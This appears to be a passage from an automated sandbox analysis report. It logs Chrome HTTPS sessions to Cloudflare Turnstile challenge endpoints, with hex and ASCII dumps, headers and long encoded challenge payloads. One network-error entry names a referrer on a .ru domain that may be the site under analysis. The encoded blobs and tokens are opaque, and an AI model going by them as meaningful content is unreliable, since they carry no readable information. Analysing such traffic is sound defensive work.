                                          2025-01-08 15:13:30 UTC431OUTData Raw: 5b 7b 22 61 67 65 22 3a 30 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 31 31 31 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 72 69 78 6f 6c 6f 2e 74 72 69 6c 69 76 61 72 2e 72 75 2f 6d 77 41 64 75 72 2f 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 30 34 2e 32 31 2e 33 33 2e 33 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 34 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f 72 22
                                          Data Ascii: [{"age":0,"body":{"elapsed_time":111,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"https://rixolo.trilivar.ru/mwAdur/","sampling_fraction":1.0,"server_ip":"104.21.33.3","status_code":404,"type":"http.error"},"type":"network-error"
                                          2025-01-08 15:13:30 UTC168INHTTP/1.1 200 OK
                                          Content-Length: 0
                                          date: Wed, 08 Jan 2025 15:13:30 GMT
                                          Via: 1.1 google
                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                          Connection: close


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          17192.168.2.549737104.18.94.414433092C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2025-01-08 15:13:31 UTC811OUTGET /cdn-cgi/challenge-platform/h/g/pat/8fed21b6fd66c343/1736349209947/fec74b01aadc5e177f85ca6ea56ff1b6f476dfc786c37e6d5d0521cef9237b61/2J4z9yOx--AhckF HTTP/1.1
                                          Host: challenges.cloudflare.com
                                          Connection: keep-alive
                                          Cache-Control: max-age=0
                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                          sec-ch-ua-mobile: ?0
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          sec-ch-ua-platform: "Windows"
                                          Accept: */*
                                          Sec-Fetch-Site: same-origin
                                          Sec-Fetch-Mode: cors
                                          Sec-Fetch-Dest: empty
                                          Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/kx1oo/0x4AAAAAAA4xQO3i_we8Fbpp/auto/fbE/normal/auto/
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2025-01-08 15:13:31 UTC143INHTTP/1.1 401 Unauthorized
                                          Date: Wed, 08 Jan 2025 15:13:31 GMT
                                          Content-Type: text/plain; charset=utf-8
                                          Content-Length: 1
                                          Connection: close
                                          2025-01-08 15:13:31 UTC2015INData Raw: 77 77 77 2d 61 75 74 68 65 6e 74 69 63 61 74 65 3a 20 50 72 69 76 61 74 65 54 6f 6b 65 6e 20 63 68 61 6c 6c 65 6e 67 65 3d 22 41 41 49 41 47 58 42 68 64 43 31 70 63 33 4e 31 5a 58 49 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 67 5f 73 64 4c 41 61 72 63 58 68 64 5f 68 63 70 75 70 57 5f 78 74 76 52 32 33 38 65 47 77 33 35 74 58 51 55 68 7a 76 6b 6a 65 32 45 41 47 57 4e 6f 59 57 78 73 5a 57 35 6e 5a 58 4d 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 3d 22 2c 20 74 6f 6b 65 6e 2d 6b 65 79 3d 22 4d 49 49 42 55 6a 41 39 42 67 6b 71 68 6b 69 47 39 77 30 42 41 51 6f 77 4d 4b 41 4e 4d 41 73 47 43 57 43 47 53 41 46 6c 41 77 51 43 41 71 45 61 4d 42 67 47 43 53 71 47 53 49 62 33 44 51 45 42 43 44 41 4c 42 67 6c 67 68 6b 67 42 5a 51 4d
                                          Data Ascii: www-authenticate: PrivateToken challenge="AAIAGXBhdC1pc3N1ZXIuY2xvdWRmbGFyZS5jb20g_sdLAarcXhd_hcpupW_xtvR238eGw35tXQUhzvkje2EAGWNoYWxsZW5nZXMuY2xvdWRmbGFyZS5jb20=", token-key="MIIBUjA9BgkqhkiG9w0BAQowMKANMAsGCWCGSAFlAwQCAqEaMBgGCSqGSIb3DQEBCDALBglghkgBZQM
                                          2025-01-08 15:13:31 UTC1INData Raw: 4a
                                          Data Ascii: J


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          18192.168.2.549738104.18.95.414433092C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2025-01-08 15:13:31 UTC599OUTGET /cdn-cgi/challenge-platform/h/g/flow/ov1/1391608476:1736346727:knR3U4ghk5DvrWm8Z0ppO7GRdQqqvFtYvV0BfWnt7jY/8fed21b6fd66c343/uFX7jtvfVSbsLDHzd_D0mPynkmsoYGulVzTiO1UjW7I-1736349208-1.1.1.1-fY3TV0on5VPSwhpvLSt8Rd53gHoedzkoXnJBOIA.OPMrOb.ffVuX8nJLBMSvOmVR HTTP/1.1
                                          Host: challenges.cloudflare.com
                                          Connection: keep-alive
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          Accept: */*
                                          Sec-Fetch-Site: none
                                          Sec-Fetch-Mode: cors
                                          Sec-Fetch-Dest: empty
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2025-01-08 15:13:31 UTC379INHTTP/1.1 404 Not Found
                                          Date: Wed, 08 Jan 2025 15:13:31 GMT
                                          Content-Type: application/json
                                          Content-Length: 7
                                          Connection: close
                                          cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                          cf-chl-out: g/3PZRKCPmio969dL8IPNAeUh5hhipJ57Sg=$BI1iq1JcsQGmsf4f
                                          Server: cloudflare
                                          CF-RAY: 8fed21ca5acec3ff-EWR
                                          alt-svc: h3=":443"; ma=86400
                                          2025-01-08 15:13:31 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                          Data Ascii: invalid


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          19192.168.2.549740104.18.94.414433092C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2025-01-08 15:13:31 UTC782OUTGET /cdn-cgi/challenge-platform/h/g/i/8fed21b6fd66c343/1736349209949/chY3ZxDNJThTUgV HTTP/1.1
                                          Host: challenges.cloudflare.com
                                          Connection: keep-alive
                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                          sec-ch-ua-mobile: ?0
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          sec-ch-ua-platform: "Windows"
                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                          Sec-Fetch-Site: same-origin
                                          Sec-Fetch-Mode: no-cors
                                          Sec-Fetch-Dest: image
                                          Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/kx1oo/0x4AAAAAAA4xQO3i_we8Fbpp/auto/fbE/normal/auto/
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2025-01-08 15:13:31 UTC200INHTTP/1.1 200 OK
                                          Date: Wed, 08 Jan 2025 15:13:31 GMT
                                          Content-Type: image/png
                                          Content-Length: 61
                                          Connection: close
                                          Server: cloudflare
                                          CF-RAY: 8fed21ce3f1e0f5b-EWR
                                          alt-svc: h3=":443"; ma=86400
                                          2025-01-08 15:13:31 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 4a 00 00 00 35 08 02 00 00 00 69 c6 ea 32 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                          Data Ascii: PNGIHDRJ5i2IDAT$IENDB`


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          20192.168.2.549743104.18.95.414433092C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2025-01-08 15:13:32 UTC428OUTGET /cdn-cgi/challenge-platform/h/g/i/8fed21b6fd66c343/1736349209949/chY3ZxDNJThTUgV HTTP/1.1
                                          Host: challenges.cloudflare.com
                                          Connection: keep-alive
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          Accept: */*
                                          Sec-Fetch-Site: none
                                          Sec-Fetch-Mode: cors
                                          Sec-Fetch-Dest: empty
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2025-01-08 15:13:32 UTC200INHTTP/1.1 200 OK
                                          Date: Wed, 08 Jan 2025 15:13:32 GMT
                                          Content-Type: image/png
                                          Content-Length: 61
                                          Connection: close
                                          Server: cloudflare
                                          CF-RAY: 8fed21d25a6843fd-EWR
                                          alt-svc: h3=":443"; ma=86400
                                          2025-01-08 15:13:32 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 4a 00 00 00 35 08 02 00 00 00 69 c6 ea 32 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                          Data Ascii: PNGIHDRJ5i2IDAT$IENDB`


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          21192.168.2.549746104.18.94.414433092C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2025-01-08 15:13:33 UTC1172OUTPOST /cdn-cgi/challenge-platform/h/g/flow/ov1/1391608476:1736346727:knR3U4ghk5DvrWm8Z0ppO7GRdQqqvFtYvV0BfWnt7jY/8fed21b6fd66c343/uFX7jtvfVSbsLDHzd_D0mPynkmsoYGulVzTiO1UjW7I-1736349208-1.1.1.1-fY3TV0on5VPSwhpvLSt8Rd53gHoedzkoXnJBOIA.OPMrOb.ffVuX8nJLBMSvOmVR HTTP/1.1
                                          Host: challenges.cloudflare.com
                                          Connection: keep-alive
                                          Content-Length: 32111
                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                          Content-type: application/x-www-form-urlencoded
                                          CF-Chl-RetryAttempt: 0
                                          sec-ch-ua-mobile: ?0
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          CF-Challenge: uFX7jtvfVSbsLDHzd_D0mPynkmsoYGulVzTiO1UjW7I-1736349208-1.1.1.1-fY3TV0on5VPSwhpvLSt8Rd53gHoedzkoXnJBOIA.OPMrOb.ffVuX8nJLBMSvOmVR
                                          sec-ch-ua-platform: "Windows"
                                          Accept: */*
                                          Origin: https://challenges.cloudflare.com
                                          Sec-Fetch-Site: same-origin
                                          Sec-Fetch-Mode: cors
                                          Sec-Fetch-Dest: empty
                                          Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/kx1oo/0x4AAAAAAA4xQO3i_we8Fbpp/auto/fbE/normal/auto/
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2025-01-08 15:13:33 UTC16384OUTData Raw: 76 5f 38 66 65 64 32 31 62 36 66 64 36 36 63 33 34 33 3d 7a 6a 54 31 6d 38 4d 48 37 38 37 69 54 69 53 4d 61 71 54 31 66 6a 59 48 38 33 4d 6d 52 6a 6e 31 6b 54 4d 4c 52 35 31 52 43 4d 70 52 42 52 71 54 38 70 52 36 59 4a 52 69 44 2d 69 38 52 45 63 31 38 33 37 44 52 58 43 38 49 52 41 65 2d 31 5a 52 75 44 69 70 52 44 44 63 44 44 5a 31 7a 54 7a 4f 77 52 6b 2d 78 37 2d 52 4d 43 4d 66 69 63 43 38 74 52 66 58 6d 67 6c 5a 52 53 43 48 34 52 53 62 58 73 56 55 55 69 2d 69 33 54 52 69 2d 34 52 30 31 69 49 52 38 6a 52 71 63 54 52 6c 36 47 6f 54 31 4d 66 65 4d 71 57 2d 41 50 77 48 44 52 67 54 25 32 62 74 4d 37 48 74 67 2d 6e 34 76 72 6d 6a 6f 52 4d 61 67 52 52 45 49 31 67 54 6c 77 52 31 54 2d 34 70 4e 50 6b 49 71 76 30 31 4f 4f 67 75 2d 30 44 46 7a 64 44 55 34 52 72 55
                                          Data Ascii: v_8fed21b6fd66c343=zjT1m8MH787iTiSMaqT1fjYH83MmRjn1kTMLR51RCMpRBRqT8pR6YJRiD-i8REc1837DRXC8IRAe-1ZRuDipRDDcDDZ1zTzOwRk-x7-RMCMficC8tRfXmglZRSCH4RSbXsVUUi-i3TRi-4R01iIR8jRqcTRl6GoT1MfeMqW-APwHDRgT%2btM7Htg-n4vrmjoRMagRREI1gTlwR1T-4pNPkIqv01OOgu-0DFzdDU4RrU
                                          2025-01-08 15:13:33 UTC15727OUTData Raw: 42 57 59 57 6d 5a 44 34 52 6e 4b 7a 4b 5a 52 75 76 71 31 38 54 52 55 52 4a 31 75 52 52 24 52 50 49 41 63 74 36 31 7a 31 66 31 71 35 52 59 52 41 31 71 2d 52 58 33 50 31 50 6a 4d 4d 52 55 44 38 39 31 41 52 4d 44 4d 35 52 4f 52 69 31 50 55 4d 7a 52 50 44 69 78 4d 56 52 75 59 78 35 4d 6e 52 70 52 50 35 52 73 6c 69 34 71 38 4d 78 52 67 4a 71 52 52 71 4b 2d 6a 59 34 4d 6c 52 42 74 59 44 53 34 54 74 4b 24 54 69 6c 52 59 31 69 4a 52 37 52 38 31 71 56 4d 49 52 4c 31 68 52 4d 4a 52 45 44 2b 67 41 55 4b 38 4a 4d 48 56 69 52 51 31 54 59 69 4d 52 6d 53 52 53 52 66 52 38 54 74 55 52 24 5a 58 56 52 72 31 78 52 4f 38 6d 24 76 53 70 54 62 24 6a 30 62 78 51 38 73 68 56 66 51 70 73 65 24 30 64 51 51 73 78 71 57 72 51 4f 56 69 71 56 61 67 38 62 46 38 52 63 51 42 38 6d 66 4d
                                          Data Ascii: BWYWmZD4RnKzKZRuvq18TRURJ1uRR$RPIAct61z1f1q5RYRA1q-RX3P1PjMMRUD891ARMDM5RORi1PUMzRPDixMVRuYx5MnRpRP5Rsli4q8MxRgJqRRqK-jY4MlRBtYDS4TtK$TilRY1iJR7R81qVMIRL1hRMJRED+gAUK8JMHViRQ1TYiMRmSRSRfR8TtUR$ZXVRr1xRO8m$vSpTb$j0bxQ8shVfQpse$0dQQsxqWrQOViqVag8bF8RcQB8mfM
                                          2025-01-08 15:13:33 UTC318INHTTP/1.1 200 OK
                                          Date: Wed, 08 Jan 2025 15:13:33 GMT
                                          Content-Type: text/plain; charset=UTF-8
                                          Content-Length: 26288
                                          Connection: close
                                          cf-chl-gen: +518zoj+vO9aNatfY7X1b3QVXiRcUgVrnWE2YYzuTkAKQWSLI0gW/Fd0sc8PoZGzhEo=$GNur1lMkxftG8mZn
                                          Server: cloudflare
                                          CF-RAY: 8fed21d8a8948c90-EWR
                                          alt-svc: h3=":443"; ma=86400
                                          2025-01-08 15:13:33 UTC1051INData Raw: 5a 6e 39 59 56 6d 39 4e 63 46 32 51 6a 59 56 57 6a 6f 56 74 54 4a 78 32 65 57 61 67 64 49 74 71 70 48 6c 30 65 32 39 39 64 49 74 6a 6c 49 42 67 65 34 65 46 62 6f 46 39 71 35 47 43 70 70 61 72 69 35 4a 30 6a 6e 75 74 6a 4c 79 44 77 49 4f 36 68 58 36 6f 6c 4a 53 56 6d 4d 32 5a 76 6f 69 69 6f 34 32 70 78 70 57 78 73 4c 4f 5a 79 62 53 7a 74 64 71 78 72 4b 2b 37 75 64 71 78 31 39 2f 6c 76 4b 7a 73 33 38 44 47 71 4d 7a 30 79 75 37 4e 2b 4f 54 4e 74 76 6e 35 36 39 61 37 41 50 50 52 30 63 2f 7a 34 64 49 48 38 39 2f 59 44 50 77 41 33 41 33 49 37 63 55 43 43 77 76 50 47 67 30 4b 36 52 6f 4c 32 64 6b 4f 44 2b 7a 6a 48 79 55 43 45 77 55 56 36 52 6e 2b 4a 4f 33 6d 2b 68 38 41 36 67 6e 76 43 54 6a 34 42 66 58 7a 45 68 55 67 4e 76 77 75 4f 68 67 65 4e 6a 38 37 4d 52 63
                                          Data Ascii: Zn9YVm9NcF2QjYVWjoVtTJx2eWagdItqpHl0e299dItjlIBge4eFboF9q5GCppari5J0jnutjLyDwIO6hX6olJSVmM2Zvoiio42pxpWxsLOZybSztdqxrK+7udqx19/lvKzs38DGqMz0yu7N+OTNtvn569a7APPR0c/z4dIH89/YDPwA3A3I7cUCCwvPGg0K6RoL2dkOD+zjHyUCEwUV6Rn+JO3m+h8A6gnvCTj4BfXzEhUgNvwuOhgeNj87MRc
                                          2025-01-08 15:13:33 UTC1369INData Raw: 72 65 31 2b 57 64 6c 39 38 63 35 4e 6d 70 36 65 57 61 4a 47 70 68 36 71 6f 73 71 52 33 6b 36 32 36 73 4c 4f 71 74 4d 43 51 6a 38 4b 34 77 37 4b 38 79 4a 43 2b 6b 73 65 58 79 63 37 45 73 4a 32 76 70 73 36 6f 71 4c 2b 72 78 73 75 6d 7a 74 6e 4b 32 65 48 4b 31 4e 72 57 6e 4e 53 64 35 72 4f 71 78 4c 66 74 78 74 33 51 77 4d 6a 49 33 74 33 51 72 64 6e 77 37 4c 58 51 74 2f 50 52 76 74 50 76 30 4c 62 32 32 74 48 79 30 38 58 68 79 74 2f 35 2f 65 6e 74 44 78 49 50 44 65 77 4c 31 2b 30 58 39 64 6a 61 49 50 51 64 2b 2f 6e 38 42 76 33 37 35 77 41 6c 35 51 55 6d 35 2b 41 59 4a 42 49 46 44 78 4c 78 4c 79 6f 6b 45 67 6b 6b 4d 77 30 4d 4b 69 38 72 4f 42 6b 62 41 67 59 42 41 52 49 47 4c 44 73 57 43 30 46 43 4f 30 4a 43 44 6c 49 30 4c 68 4e 57 54 30 68 59 4e 45 6c 58 48 6c
                                          Data Ascii: re1+Wdl98c5Nmp6eWaJGph6qosqR3k626sLOqtMCQj8K4w7K8yJC+kseXyc7EsJ2vps6oqL+rxsumztnK2eHK1NrWnNSd5rOqxLftxt3QwMjI3t3Qrdnw7LXQt/PRvtPv0Lb22tHy08Xhyt/5/entDxIPDewL1+0X9djaIPQd+/n8Bv375wAl5QUm5+AYJBIFDxLxLyokEgkkMw0MKi8rOBkbAgYBARIGLDsWC0FCO0JCDlI0LhNWT0hYNElXHl
                                          2025-01-08 15:13:33 UTC1369INData Raw: 6b 61 56 6f 69 57 69 76 6f 71 36 4d 6e 70 4b 4c 73 4b 36 56 68 6f 6d 43 74 35 32 50 6b 37 71 49 65 48 6d 43 67 70 58 46 65 61 50 45 79 63 62 44 6d 34 7a 44 79 4b 32 2f 6f 71 69 50 6f 4c 69 6b 72 4a 4c 59 30 4e 36 31 72 4b 36 35 6f 62 47 73 78 72 4f 5a 33 64 53 6f 71 64 6a 6c 77 2b 71 34 37 2f 4f 7a 36 63 4c 78 34 65 57 34 77 73 58 79 74 72 58 4b 79 2b 43 37 2f 73 36 39 42 72 30 4b 42 4e 7a 38 39 65 58 69 7a 39 76 73 46 41 34 43 45 68 67 42 39 2b 6a 51 38 74 4d 57 38 78 76 6f 46 53 4d 4f 33 76 33 65 35 74 34 41 36 43 62 6c 35 53 37 6c 4d 75 4d 46 4a 52 34 4f 43 7a 49 6d 49 76 4d 32 39 69 59 36 4b 69 34 42 2b 45 55 79 49 52 37 35 46 78 6f 54 4f 43 6b 4a 43 53 41 78 4a 30 78 48 4d 46 45 57 4a 6c 52 4f 4e 6c 45 76 53 6c 55 63 55 56 6b 32 4d 32 41 79 57 56 67
                                          Data Ascii: kaVoiWivoq6MnpKLsK6VhomCt52Pk7qIeHmCgpXFeaPEycbDm4zDyK2/oqiPoLikrJLY0N61rK65obGsxrOZ3dSoqdjlw+q47/Oz6cLx4eW4wsXytrXKy+C7/s69Br0KBNz89eXiz9vsFA4CEhgB9+jQ8tMW8xvoFSMO3v3e5t4A6Cbl5S7lMuMFJR4OCzImIvM29iY6Ki4B+EUyIR75FxoTOCkJCSAxJ0xHMFEWJlRONlEvSlUcUVk2M2AyWVg
                                          2025-01-08 15:13:33 UTC1369INData Raw: 4b 6d 46 61 32 2b 45 64 59 4f 71 67 49 57 32 63 5a 57 6f 64 72 56 38 6a 62 35 35 72 4b 32 56 66 70 50 4b 6f 4d 6e 41 70 38 54 4d 6d 36 57 76 6f 61 69 2f 6c 4c 43 72 31 4a 62 58 6b 74 4f 65 7a 4b 2b 72 6f 72 79 76 32 62 53 76 30 74 47 31 36 73 44 44 75 4f 37 65 77 4e 4c 49 36 65 54 51 38 2f 65 32 79 76 6a 4a 2f 74 58 51 2b 38 33 42 32 75 47 39 32 64 6e 42 41 63 54 69 79 51 54 6c 41 50 30 4a 38 2f 50 6b 30 4f 37 6d 44 65 49 63 37 68 33 5a 33 75 37 34 30 77 2f 61 39 76 7a 33 2f 68 38 48 35 51 45 63 44 50 33 2b 42 4f 6f 52 45 76 4d 42 46 42 59 69 44 43 63 5a 37 69 38 54 50 69 6f 55 4c 2f 76 32 4e 78 73 67 4d 68 77 32 4b 77 73 5a 52 44 67 44 48 56 51 4c 53 6b 45 6f 55 6c 4a 55 4a 52 51 59 4c 31 77 78 58 6a 6c 51 52 55 34 39 56 6a 74 6d 49 31 4d 2f 56 7a 73 36
                                          Data Ascii: KmFa2+EdYOqgIW2cZWodrV8jb55rK2VfpPKoMnAp8TMm6Wvoai/lLCr1JbXktOezK+roryv2bSv0tG16sDDuO7ewNLI6eTQ8/e2yvjJ/tXQ+83B2uG92dnBAcTiyQTlAP0J8/Pk0O7mDeIc7h3Z3u740w/a9vz3/h8H5QEcDP3+BOoREvMBFBYiDCcZ7i8TPioUL/v2NxsgMhw2KwsZRDgDHVQLSkEoUlJUJRQYL1wxXjlQRU49VjtmI1M/Vzs6
                                          2025-01-08 15:13:33 UTC1369INData Raw: 6d 69 67 4c 56 31 68 5a 4b 54 6b 33 79 4e 69 34 43 63 6a 37 75 56 6a 37 4b 78 6b 37 6d 44 74 5a 6e 4e 79 71 65 63 71 37 37 51 78 36 7a 54 73 72 6a 4d 74 37 57 79 73 35 36 32 6d 73 37 62 30 61 62 64 73 73 53 70 37 4e 7a 43 78 74 66 44 37 4c 37 4a 72 2b 4f 78 39 62 57 7a 79 74 66 50 74 64 72 56 37 2f 4c 4e 37 37 76 63 76 4f 50 62 78 65 66 35 32 66 37 63 44 4d 6e 70 33 64 50 76 42 68 6a 4a 45 74 54 51 37 39 4c 57 33 66 59 61 34 4f 44 5a 45 69 58 59 49 78 6f 42 36 65 73 6d 43 65 6e 6c 4a 69 37 79 4c 68 51 67 38 41 77 59 44 77 4d 35 46 43 6a 77 39 52 67 52 41 78 67 44 48 51 4e 44 4d 69 49 48 43 77 4d 72 44 42 41 73 54 67 77 71 52 6b 34 50 55 68 63 35 47 31 64 4f 55 78 63 67 54 68 6b 65 46 6b 51 67 49 54 39 6d 52 69 74 6d 61 6c 30 6c 52 69 74 4b 4c 55 70 4a 51
                                          Data Ascii: migLV1hZKTk3yNi4Ccj7uVj7Kxk7mDtZnNyqecq77Qx6zTsrjMt7Wys562ms7b0abdssSp7NzCxtfD7L7Jr+Ox9bWzytfPtdrV7/LN77vcvOPbxef52f7cDMnp3dPvBhjJEtTQ79LW3fYa4ODZEiXYIxoB6esmCenlJi7yLhQg8AwYDwM5FCjw9RgRAxgDHQNDMiIHCwMrDBAsTgwqRk4PUhc5G1dOUxcgThkeFkQgIT9mRitmal0lRitKLUpJQ
                                          2025-01-08 15:13:33 UTC1369INData Raw: 53 69 62 2b 79 6e 59 7a 43 75 72 79 52 6e 37 61 59 67 70 57 6e 71 49 6e 4b 71 37 71 4c 7a 72 50 44 70 36 76 42 70 35 50 57 33 62 32 61 74 4a 76 54 6e 4c 7a 4e 76 71 44 6f 32 73 6d 34 32 73 44 44 74 39 6d 72 76 38 44 68 71 38 7a 49 30 4e 44 4d 79 4f 76 75 30 73 6a 48 37 64 32 37 74 64 76 74 43 41 50 6e 2b 74 72 56 35 2f 6e 49 43 2f 6e 6e 79 73 58 72 38 4e 45 54 38 50 66 52 42 39 76 5a 37 4f 67 58 2f 4f 30 53 42 50 76 76 46 78 2f 2b 39 53 77 66 43 76 67 76 4a 79 6e 39 44 43 4d 46 37 67 30 79 49 76 4d 47 42 54 44 34 4f 2f 34 72 2b 7a 38 63 48 68 52 44 47 44 63 68 4a 54 73 32 47 30 34 4d 48 31 52 43 4e 54 34 69 4d 42 68 52 4b 43 52 58 52 6a 45 34 47 44 49 73 4a 45 42 45 49 46 4a 4a 58 43 56 6e 4b 30 77 2f 52 57 35 61 4c 30 67 7a 58 7a 41 34 55 46 55 79 52 57
                                          Data Ascii: Sib+ynYzCuryRn7aYgpWnqInKq7qLzrPDp6vBp5PW3b2atJvTnLzNvqDo2sm42sDDt9mrv8Dhq8zI0NDMyOvu0sjH7d27tdvtCAPn+trV5/nIC/nnysXr8NET8PfRB9vZ7OgX/O0SBPvvFx/+9SwfCvgvJyn9DCMF7g0yIvMGBTD4O/4r+z8cHhRDGDchJTs2G04MH1RCNT4iMBhRKCRXRjE4GDIsJEBEIFJJXCVnK0w/RW5aL0gzXzA4UFUyRW
                                          2025-01-08 15:13:33 UTC1369INData Raw: 78 61 39 39 6e 4d 57 36 68 71 43 31 71 34 62 4b 7a 62 75 4b 6b 39 47 74 6a 39 4c 56 74 70 4c 47 33 63 57 57 32 74 58 41 6e 4c 69 76 7a 5a 2b 38 31 63 65 6c 71 39 6e 4c 71 4d 54 6c 7a 71 6e 49 37 64 4b 76 34 76 6e 5a 74 74 44 70 37 72 66 36 2f 64 6d 37 41 4e 2f 74 77 4e 7a 39 38 38 4d 48 2f 66 62 48 7a 39 76 79 79 77 38 43 42 38 34 44 44 67 54 57 38 42 34 49 31 66 51 57 41 39 76 34 45 67 50 65 49 78 6f 48 34 68 63 71 42 75 63 62 48 68 76 71 4c 7a 59 55 37 75 6b 55 49 2f 49 6e 43 42 2f 32 4f 30 49 73 2b 79 38 79 4c 67 4d 64 53 69 6f 43 49 54 34 34 43 68 42 43 4d 51 73 2f 55 6b 63 52 4c 6a 41 79 46 46 63 38 50 52 67 31 57 6b 4d 63 54 31 5a 47 48 6a 31 61 53 79 56 42 5a 6c 59 6e 57 31 42 54 4c 45 6c 41 56 54 46 4e 59 6d 73 30 55 6c 68 63 4f 45 42 71 57 6a 74
                                          Data Ascii: xa99nMW6hqC1q4bKzbuKk9Gtj9LVtpLG3cWW2tXAnLivzZ+81celq9nLqMTlzqnI7dKv4vnZttDp7rf6/dm7AN/twNz988MH/fbHz9vyyw8CB84DDgTW8B4I1fQWA9v4EgPeIxoH4hcqBucbHhvqLzYU7ukUI/InCB/2O0Is+y8yLgMdSioCIT44ChBCMQs/UkcRLjAyFFc8PRg1WkMcT1ZGHj1aSyVBZlYnW1BTLElAVTFNYms0UlhcOEBqWjt
                                          2025-01-08 15:13:33 UTC1369INData Raw: 71 57 73 67 34 57 50 6d 4d 32 4d 30 37 4f 74 71 64 4b 58 75 70 4b 6c 6d 72 57 58 32 72 53 54 73 4d 36 38 34 5a 32 38 35 63 71 68 37 4b 66 4f 70 72 6d 75 79 61 76 75 37 64 43 74 77 76 6e 6d 79 50 62 55 2b 62 58 4b 32 38 2f 57 42 63 4c 68 32 39 76 6f 2f 4f 48 37 36 39 76 69 7a 2b 66 73 79 64 33 53 41 2b 6e 58 34 42 66 55 48 65 66 31 38 76 54 66 49 64 6e 75 38 78 50 30 49 77 45 71 34 66 58 6d 43 65 58 36 42 42 38 48 38 2f 77 33 38 44 6b 55 45 68 41 52 2b 7a 48 31 43 69 41 76 45 54 38 64 51 66 30 54 53 69 55 61 54 45 41 58 43 52 73 48 50 79 46 50 4c 55 6b 4f 49 6b 77 6a 46 53 63 54 4f 52 59 71 56 43 73 63 5a 52 74 54 4e 57 4e 42 49 53 49 32 59 44 63 6f 63 53 64 4e 4b 6a 35 6f 50 7a 42 70 4c 32 64 4a 64 31 56 2f 4e 6b 70 30 53 7a 78 31 4f 32 45 2b 55 6e 78 54
                                          Data Ascii: qWsg4WPmM2M07OtqdKXupKlmrWX2rSTsM684Z285cqh7KfOprmuyavu7dCtwvnmyPbU+bXK28/WBcLh29vo/OH769viz+fsyd3SA+nX4BfUHef18vTfIdnu8xP0IwEq4fXmCeX6BB8H8/w38DkUEhAR+zH1CiAvET8dQf0TSiUaTEAXCRsHPyFPLUkOIkwjFScTORYqVCscZRtTNWNBISI2YDcocSdNKj5oPzBpL2dJd1V/Nkp0Szx1O2E+UnxT


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
